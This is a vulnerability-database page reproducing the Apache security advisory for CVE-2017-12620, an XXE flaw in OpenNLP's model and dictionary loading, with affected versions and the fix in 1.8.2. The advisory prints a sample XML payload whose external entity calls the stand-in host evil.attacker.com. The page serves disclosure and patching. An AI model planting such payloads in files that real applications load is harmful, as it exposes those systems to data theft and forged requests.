Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache OpenNLP XXE Vulnerability

🗓️ 04 Oct 2017 00:00:00Reported by Jörn KottmannType 
zdt
 zdt🔗 0day.today👁 30 Views

Apache OpenNLP XXE Vulnerability CVE-2017-1262

Related
Code
ReporterTitlePublishedViews
Family
Gitee		Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
16 May 202116:14
gitee
Gitee		Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
27 Apr 202114:33
gitee
Gitee		Exploit for Unrestricted Upload of File with Dangerous Type in Apache Tomcat
22 Oct 202115:45
gitee
IBM Security Bulletins		Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities
13 Aug 202122:15
ibm
IBM Security Bulletins		Security Bulletin: IBM Cognos Analytics with Watson 11.2.1 has addressed multiple vulnerabilities
14 Oct 202121:21
ibm
CNVD		Apache OpenNLP XXE Vulnerability
31 Oct 201700:00
cnvd
CVE		CVE-2017-12620
2 Oct 201714:00
cve
Cvelist		CVE-2017-12620
2 Oct 201714:00
cvelist
EUVD		EUVD-2022-4039
3 Oct 202520:07
euvd
Github Security Blog		Improper Restriction of XML External Entity Reference in Apache OpenNLP
17 May 202200:29
github
Rows per page
CVE-2017-12620 - Apache OpenNLP XXE vulnerability

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected:

    OpenNLP 1.5.0 to 1.5.3

    OpenNLP 1.6.0

    OpenNLP 1.7.0 to 1.7.2

    OpenNLP 1.8.0 to 1.8.1

Description: When loading models or dictionaries that contain XML it is possible to perform an XXE attack, since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.

Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.

Example:

An attacker can place this:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>

Inside one of the XML files, either a dictionary or embedded inside a model package, to demonstrate this vulnerability.

Credit: This issue was discovered by Nishil Shah of Salesforce.


#  0day.today [2018-01-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Oct 2017 00:00Current
9.3High risk
Vulners AI Score9.3
EPSS0.01018
apache opennlpxxe vulnerabilitycve-2017-12620medium severityapache software foundationversions affectedxxe attackmitigationxml dictionariesuntrusted sourcesupdate1.8.2nishil shahsalesforce.
30